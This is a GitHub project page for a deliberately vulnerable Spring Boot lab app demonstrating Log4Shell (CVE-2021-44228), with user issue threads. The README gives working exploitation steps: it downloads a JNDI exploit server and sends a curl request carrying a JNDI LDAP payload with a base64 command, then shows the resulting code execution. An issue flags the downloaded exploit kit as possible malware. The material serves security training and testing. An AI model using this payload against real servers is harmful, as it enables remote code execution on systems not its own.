Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Related tags

Spring Boot log4shell-vulnerable-app
Overview

Log4Shell sample vulnerable application (CVE-2021-44228)

This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181.

Running the application

Run it:

docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Build it yourself (you don't need any Java-related tooling):

docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app --rm vulnerable-app

Exploitation steps

Note: This is highly inspired from the original LunaSec advisory. Run at your own risk, preferably in a VM in a sandbox environment.

Update (Dec 13th): The JNDIExploit repository has been removed from GitHub (presumably, not by GitHub). Just append web.archive.org in front of the JNDIExploit download URL below to use the version cached by the Wayback Machine.

wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • Then, trigger the exploit using:
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • To confirm that the code execution was successful, notice that the file /tmp/pwned.txt was created in the container running the vulnerable application:
$ docker exec vulnerable-app ls /tmp
...
pwned
...

Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Contributors

@christophetd @rayhan0x01

Comments
  • Without alpine image, Log4j don't follow Exploit*.class

    Without alpine image, Log4j don't follow Exploit*.class

    If I change container image from openjdk:8u181-jdk-alpine to openjdk:8u181-jdk, the vulnerability does not occur.

    Log4j don't follow http://my-ip:8888/Exploit*.class.

    bug 
    opened by mhagnumdw 7
  • Possible malware in https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

    Possible malware in https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

    I copied and pasted my reponse for the previous issue, creating a new one to raise attention.

    Okay, I managed to grab a copy of this kit.... a really weird story.

    I have it as a private repo and I reported it to github...

    I originally found this exploit kit posted on this blog for a lab here. This was 12/10 https://www.insecurewi.re/setting-up-a-log4shell-lab-cve-2021-44228/

    When I went to https://github.com/feihong-cs/JNDIExploit/ the files were actively being deleted as I was looking the repo and readme was updated to say "This repository has been lost"

    There was an issue with two comments. The conversation went like this "The malware link keeps going down brother" "Thats going to happen"

    I had to get the release from the commit history and it was literally deleted a few seconds after I downloaded the zip.

    I reported all this to github.

    Of course, I have not heard anything. We should have a trusted malware expert review these files. The web archive showed active development mid-late November

    opened by samjcs 5
  • error..

    error..

    i'm trying to replicate the log4j environment but when i'm executing the base64 payload which is : "uname -a;id' .. it only execute the second command : id... it doesn't execute both commands.. can you tell me why ?..

    Thanks you!

    opened by scotch123 4
  • Docker build problem

    Docker build problem

    Command

    docker build . -t vulnerable-app

    Problem

    Step 8/9 : COPY --from=builder /home/gradle/src/build/libs/*.jar /app/spring-boot-application.jar
When using COPY with more than one source file, the destination must be a directory and end with a /

    Inside libs folder are two jars:

    • log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar
    • log4shell-vulnerable-app-0.0.1-SNAPSHOT-plain.jar
    opened by mhagnumdw 4
  • Is there any way I can run this as a Java application?

    Is there any way I can run this as a Java application?

    There are instruction to run this app using docker. But I want to run this application as jar file and I tried ./gradlew build which results in two jar files. Again, throws multiple error. Maybe some where I am going wrong. Please help.

    help wanted 
    opened by Pruthviraj-Deshmukh 3
  • JNDIExploit unavailable

    JNDIExploit unavailable

    Hi all, it looks like the exploit located at https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip is not available anymore. The repository does not exist. Any workarounds?

    root~$ wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip --2021-12-20 15:16:32-- https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip Resolving github.com (github.com)... 140.82.114.3 Connecting to github.com (github.com)|140.82.114.3|:443... connected. HTTP request sent, awaiting response... 404 Not Found 2021-12-20 15:16:33 ERROR 404: Not Found.

    opened by mrbuckethead 3
  • There is no evidence

    There is no evidence

    No file is written to /tmp/ when I try it. In the logs it looks like the JNDI lookup was rejected:

    2022-03-18 14:16:08,794 http-nio-8080-exec-3 WARN Error looking up JNDI resource [ldap://193.168.0.163:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=]. javax.naming.CommunicationException: 193.168.0.163:1389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
	at com.sun.jndi.ldap.Connection.<init>(Connection.java:238)
	...
	at com.sun.jndi.ldap.Connection.<init>(Connection.java:215)
	... 92 more

2022-03-18 14:14:53.780  INFO 1 --- [nio-8080-exec-3] HelloWorld                               : Received a request for API version ${jndi:ldap://193.168.0.163:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}

    So it doesn't prove anything. When I look in /tmp/ there is nothing special there:

    % docker exec vulnerable-app ls /tmp                                                                                     
hsperfdata_root
tomcat-docbase.8080.3744927603747357857
tomcat.8080.854741383858943471

    The JNDIExploit.jar doesn't output any indication that it was queried

    % java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.0.163 -p 8888
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
    opened by montao 2
  • Readme outdated

    Readme outdated

    the link to the malicious ldap server does not exist anymore. https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip this doeas not exist. Is there any alternative for it?

    opened by Lvc4 2
  • /tmp/pwned gets written but there's a stacktrace from the vulnerable app

    /tmp/pwned gets written but there's a stacktrace from the vulnerable app

    Running Ubuntu 21 in a VM with QEMU, installing manually JDK 1.8 u181 and docker run the vulnerable app makes the log4shell write the /tmp/pwned as expected.

    There is a stack trace though which I'm not sure if it is expected or an indication that something is not alright. I paste it here if it can lead to some improvement. (At first I had a connectivity issue. After I changed the IP address to the one reported by the network in Ubuntu settings, then the JNDIExploit activates and the evidence is written to /tmp/pwned.

    It's just this stack trace from the vulnerable app that I wonder if it's expected or something that can be improved. (I changed the IP address to not expose my IP address.)

    2022-03-21 05:16:33,778 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://42.0.42.13:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: ExploitzLFvl3rR1Z cannot be cast to javax.naming.spi.ObjectFactory]; remaining name '"Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo="'
at com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1092)
at com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
at com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:205)
at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at javax.naming.InitialContext.lookurp(InitialContext.java:417)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:221)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1110)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1033)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:467)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:344)
at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:244)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:229)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)
at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:540)
at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:498)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:481)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:456)
at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)
at org.apache.logging.log4j.core.Logger.log(Logger.java:161)
at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2205)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2159)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2142)
at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2017)
at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1983)
at [org.apache.logging.log4j.spi.AbstractLogger.info](http://org.apache.logging.log4j.spi.abstractlogger.info/)(AbstractLogger.java:1320)
at fr.christophetd.log4shell.vulnerableapp.MainController.index(MainController.java:18)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)
at org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:150)
at org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)
at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)
at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)
at org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1067)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:963)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)
at org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:655)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:540)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:357)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:895)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1722)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.ClassCastException: ExploitzLFvl3rR1Z cannot be cast to javax.naming.spi.ObjectFactory
at javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:163)
at javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:189)
at com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1085)
... 88 more

2022-03-21 05:16:33.524 INFO 1 --- [nio-8080-exec-1] HelloWorld : Received a request for API version ${jndi:ldap://42.0.42.13:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
    opened by montao 1
  • Add rm flag in documentation

    Add rm flag in documentation

    Simply added rm flag in documentation that clean up the container when the container exits. https://docs.docker.com/engine/reference/run/#clean-up---rm

    opened by giper45 1
  • docker build problem on kali linux

    docker build problem on kali linux

    Hi, Hello i have build this on both windows and mac without any problem. But when i trying building springboot via kali linux, i got this error message 👎 Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg. [1/2] STEP 1/4: FROM gradle:7.3.1-jdk17-alpine AS builder [2/2] STEP 1/5: FROM openjdk:8u181-jdk-alpine Error: error creating build container: short-name "gradle:7.3.1-jdk17-alpine" did not resolve to an alias and no unqualified-search registries are defined in "/etc/containers/registries.conf"

    Can you please let me know the solution. Thank you

    opened by okofishe 1
  • No longer working

    No longer working

    Hi, this sample is no longer working, the log on the vulnerable application shows this error: "java.lang.IllegalArgumentException: The HTTP header line [x-/api/msg Api-Version: ${jndi:ldap://127.0.0.1/a}] does not conform to RFC 7230 and has been ignored."

    Is there any particular version of the environment dependencies that need to be used? Or have they backported the fixes?

    I would love to use this on a training exercise for new devs, but I can't get it to behave as it should.

    opened by drcircuit 7
Owner
Christophe Tafani-Dereeper
Christophe Tafani-Dereeper
GitHub
Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions

Log4Shell Hotfix Side Effect Test Case I wanted to know if any ClassNotFoundException or similar unexpected exception is raised when one applies the C

Malte S. Stretz 3 Nov 9, 2022
该仓库中主要是 Spring Boot 的入门学习教程以及一些常用的 Spring Boot 实战项目教程,包括 Spring Boot 使用的各种示例代码,同时也包括一些实战项目的项目源码和效果展示,实战项目包括基本的 web 开发以及目前大家普遍使用的线上博客项目/企业大型商城系统/前后端分离实践项目等,摆脱各种 hello world 入门案例的束缚,真正的掌握 Spring Boot 开发。

Spring Boot Projects 该仓库中主要是 Spring Boot 的入门学习教程以及一些常用的 Spring Boot 实战项目教程,包括 Spring Boot 使用的各种示例代码,同时也包括一些实战项目的项目源码和效果展示,实战项目包括基本的 web 开发以及目前大家普遍使用的前

十三 4.5k Dec 30, 2022
Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real

Tri Wanda Septian 19 Jun 10, 2022
Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec

log4shell-dockerlab Credits All credits goes to the original authors. I just git-cloned and created a docker-compose file, that's all. LunaSec - log4s

ChoI 7 Nov 17, 2022
循序渐进,学习Spring Boot、Spring Boot & Shiro、Spring Batch、Spring Cloud、Spring Cloud Alibaba、Spring Security & Spring Security OAuth2,博客Spring系列源码:https://mrbird.cc

Spring 系列教程 该仓库为个人博客https://mrbird.cc中Spring系列源码,包含Spring Boot、Spring Boot & Shiro、Spring Cloud,Spring Boot & Spring Security & Spring Security OAuth2

mrbird 24.8k Jan 6, 2023
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex

Zhuang Ma 2 Dec 14, 2021
Small example repo for looking into log4j CVE-2021-44228

log4j CVE-2021-44228 Lame useless repo to look into log4j CVE-2021-44228. Setup The repository contains a .idea/ folder which is a IntelliJ IDEA proje

null 65 Dec 13, 2022
Scan and patch tool for CVE-2021-44228 and related log4j concerns.

A Log4J2 CVE-2021-44228 Vulnerability Scanner and Patcher Links to download the latest version: Linux x64 with glibc2.17+ (RHEL7+) Windows & all other

SAS Software 33 Jun 1, 2022
A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).

MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4

Koupa Taylor 4 Jan 4, 2022
An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228

evil-rmi-server An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228 in a local privesc scenario Build ./gradlew

Adam Bertrand 12 Nov 9, 2022
Log4J CVE-2021-44228 Minecraft PoC

CVE-2021-44228 in Minecraft Java 16 Paper server build #397 Minecraft 1.17.1 Exploitation In Java 16 only deserialization attacks work by default usin

myxl 5 Feb 15, 2022
Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

Log4j CVE-2021-44228 and CVE-2021-45046 Requisites Use a vulnerable JDK, for instance JDK 1.8.0_181 Usage Malicious server The malicious server deploy

Manuel Álvarez Álvarez 5 Feb 7, 2022
CVE-2021-44228 - Apache log4j RCE quick test

Build ./build.sh Start log4j RCE Server ./start-log4j-rce-server.sh Test Run java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j Check if you get logs in ha

Jeffrey Li 3 Feb 1, 2022
Some tools to help mitigating Apache Log4j 2 CVE-2021-44228

JndiLookup Some tool to help analyzing Apache Log4j 2 CVE-2021-44228 This tool uses the "lookup" feature from log4j-2 to test against the JNDI vulnera

Daniel Fages 3 Dec 18, 2021
A short demo of CVE-2021-44228

sample-ldap-exploit A short demo of CVE-2021-44228 Build $ mvn clean verify Run Attacker $ java \ -cp 'attacker/target/sample-attacker.jar:attacker

Philip Oswald 6 Oct 19, 2022
This project will help to test the Log4j CVE-2021-44228 vulnerability.

Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on

Immunity, Inc 9 Jun 30, 2022
Vulnerability CVE-2021-44228 checker

CVE-2021-44228 checker This is the repository for checking for vulnerability CVE-2021-44228. This is a PoC that only displays strings without any exte

Yasuhiro Yamada 36 Nov 9, 2022
Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process

-- This repository has been archived -- Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2. Thanks for sharing, com

Volker Simonis 108 Dec 23, 2021
Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information

Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas

Johannes Jäger 181 Dec 2, 2022